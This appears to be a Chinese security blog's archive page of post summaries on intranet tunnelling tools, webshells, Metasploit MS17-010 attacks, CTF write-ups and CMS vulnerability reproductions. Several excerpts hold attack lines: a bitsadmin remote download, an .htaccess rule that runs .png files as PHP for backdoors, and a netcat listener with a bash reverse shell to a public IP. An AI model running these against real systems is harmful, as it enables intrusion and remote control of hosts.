06 2020 档案
发表于 2020-06-29 14:51阅读:6495评论:0推荐:0
摘要:一、简介 NPS是一款轻量级,高性能,强大功能的内网穿透代理服务器。目前支持TCP,UDP流量转发,可支持任何TCP,UDP上层协议(访问内网网站,本地支付接口调试,SSH访问,远程桌面,内网dns解析等等...
阅读全文 »
发表于 2020-06-29 14:50阅读:699评论:0推荐:0
摘要:简介 lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入...
阅读全文 »
发表于 2020-06-29 14:50阅读:828评论:0推荐:0
摘要:一、简介 EarthWorm是内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。为实现这些功能,EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssoc...
阅读全文 »
发表于 2020-06-29 14:49阅读:357评论:0推荐:0
摘要:漏洞环境192.168.91.136 windows7 6.1.7601 192.168.91.151 kaliWindows7 SP1下载链接:ed2k://|file|cn_windows_...
阅读全文 »
发表于 2020-06-29 14:49阅读:651评论:0推荐:0
摘要:一、简介 reGeorg是reDuh的继承者,利用了会话层的socks5协议,效率更高结合Proxifier使用 Proxifier是一款功能非常强大的socks5客户端,可以让不支持...
阅读全文 »
发表于 2020-06-29 14:48阅读:1954评论:0推荐:0
摘要:前言:phpmyadmin后台拿webshell的方法主要分为两个方法:(1) 、通过日志文件拿webshell;(2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难);本地搭建环境:Phpmy...
阅读全文 »
发表于 2020-06-29 14:47阅读:1839评论:0推荐:0
摘要:bitsadmin的四种下载文件的方法一、bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt二、bitsadmi...
阅读全文 »
发表于 2020-06-29 14:46阅读:795评论:0推荐:0
摘要:对于没有公网 IP 的内网用户来说,远程管理或在外网访问内网机器上的服务是一个问题。 今天给大家介绍一款好用内网穿透工具 FRP,FRP 全名:Fast Reverse Proxy。FRP 是一个使用 Go 语言...
阅读全文 »
发表于 2020-06-29 14:45阅读:352评论:0推荐:0
摘要:0x00 NC命令详解在介绍如何反弹shell之前,先了解相关知识要点。nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认...
阅读全文 »
发表于 2020-06-29 14:44阅读:1491评论:0推荐:0
摘要:其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。 一、准备工作 1.安装了Msf的公网主机+Ubuntu系统
阅读全文 »
发表于 2020-06-28 18:13阅读:497评论:0推荐:0
摘要:工具简介FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨...
阅读全文 »
发表于 2020-06-28 18:11阅读:194评论:0推荐:0
摘要:打开题目F12看到一个被注释的跳转。 访问可以知道是一个文件包含经过测试,该文件禁止了input、data关键字。并禁止了phar://协议。使用php://filter读取题目源码得到http://47.94....
阅读全文 »
发表于 2020-06-28 18:08阅读:190评论:0推荐:0
摘要:题目链接:http://47.94.221.39:8008/扫描目录得到/.DS_Store文件 下载文件,直接用脚本进行还原操作。 https://github.com/lijiejie/ds_store_ex...
阅读全文 »
发表于 2020-06-28 18:07阅读:330评论:0推荐:0
摘要:工具简介GithubL:https://github.com/qianxiao996/FrameScanFrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可...
阅读全文 »
发表于 2020-06-28 18:04阅读:493评论:0推荐:0
摘要:1、.htaccess文件2、文件上传绕过一般.htaccess可以用来留后门和针对黑名单绕过创建一个txt写入(png解析为php)AddType application/x-httpd-php .png另存为...
阅读全文 »
发表于 2020-06-28 18:01阅读:402评论:0推荐:0
摘要:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php...
阅读全文 »
发表于 2020-06-28 17:49阅读:1018评论:0推荐:0
摘要:0x00 影响范围v4.2.1-v4.2.1290x01 环境搭建1. 先去官网下载 骑士人才系统基础版(安装包)2.将下载好的包进行安装 0x02 复现过程当前版本v4.2.111 点加工具,点击风格模板 Pa...
阅读全文 »
发表于 2020-06-28 17:23阅读:858评论:0推荐:0
摘要:圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接0x01 环境准备1、首先去码云下载最新版本的discuz(DiscuzX 3.4 R20191201)。 2、将upaod放置到网站目录下...
阅读全文 »
发表于 2020-06-28 17:16阅读:2730评论:0推荐:1
摘要:CTF-Tools一款CTF编码、解码、加密、解密工具。支持的编码解码:URL-UTF-8 URL-GB2312 Unicode Escape(%U) HtmlEncode ACSII Base16 Base32...
阅读全文 »
发表于 2020-06-28 17:06阅读:403评论:0推荐:0
摘要:1、寻找目标首先FOFA找一个环境,检测工具检测一下发现目标,开干!2、开启监听首先在vps运行nc 监听一个端口nc -lvp 666列出需要使用的反弹指令bash -i >& /dev/tcp/129.204...
阅读全文 »
